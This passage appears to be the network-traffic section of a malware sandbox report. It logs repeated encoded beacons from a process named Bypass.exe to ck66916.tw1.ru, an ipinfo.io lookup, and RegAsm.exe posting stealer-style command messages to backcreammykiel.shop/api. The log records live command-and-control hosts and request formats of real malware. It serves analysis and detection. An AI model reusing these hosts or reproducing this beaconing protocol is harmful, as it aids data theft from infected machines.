                        Jun 23, 2024 06:57:24.857641935 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:57:25.557725906 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        36192.168.2.44978492.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:30.574831009 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:57:31.268132925 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.2.44978592.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:36.277936935 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:57:37.000525951 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:36 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.2.44978692.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:42.012749910 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:57:42.723964930 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:42 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        39192.168.2.44978792.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:47.747111082 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:57:48.455339909 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:48 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        40192.168.2.44978892.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:53.480514050 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:57:54.204020977 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:54 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        41192.168.2.44978992.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:59.215189934 CEST2196OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:57:59.939810038 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination Port
                        0192.168.2.44973034.117.186.192443
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:53:53 UTC59OUTGET / HTTP/1.1
                        Host: ipinfo.io
                        Connection: Keep-Alive
                        2024-06-23 04:53:53 UTC513INHTTP/1.1 200 OK
                        server: nginx/1.24.0
                        date: Sun, 23 Jun 2024 04:53:53 GMT
                        content-type: application/json; charset=utf-8
                        Content-Length: 319
                        access-control-allow-origin: *
                        x-frame-options: SAMEORIGIN
                        x-xss-protection: 1; mode=block
                        x-content-type-options: nosniff
                        referrer-policy: strict-origin-when-cross-origin
                        x-envoy-upstream-service-time: 3
                        via: 1.1 google
                        strict-transport-security: max-age=2592000; includeSubDomains
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2024-06-23 04:53:53 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                        Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.449731104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:15 UTC267OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                        Data Ascii: act=life
                        2024-06-23 04:54:15 UTC818INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=6je6s0p96ve12itp3nn6f0m7l3; expires=Wed, 16-Oct-2024 22:40:54 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajnPQLCfuOrjv%2F4cKewbDc%2BAv7kJPahO0zAMpHZfNmknqVbIpJRAlD9nSkddFxEZfZ%2Bnna26N%2FLjX2xs%2BieWw5UE%2BYp8OiYtfRCSFg2sd78UP2pzn2Sqec%2BHOL0yQHxUrU%2FGxTrKxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e1090f514294-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                        Data Ascii: 2ok
                        2024-06-23 04:54:15 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449732104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:16 UTC268OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 57
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:16 UTC57OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 74 74 65 26 6a 3d 64 65 66 61 75 6c 74
                        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@Qudette&j=default
                        2024-06-23 04:54:16 UTC814INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:16 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=uvktu02378fgs56ss43a7tun49; expires=Wed, 16-Oct-2024 22:40:55 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
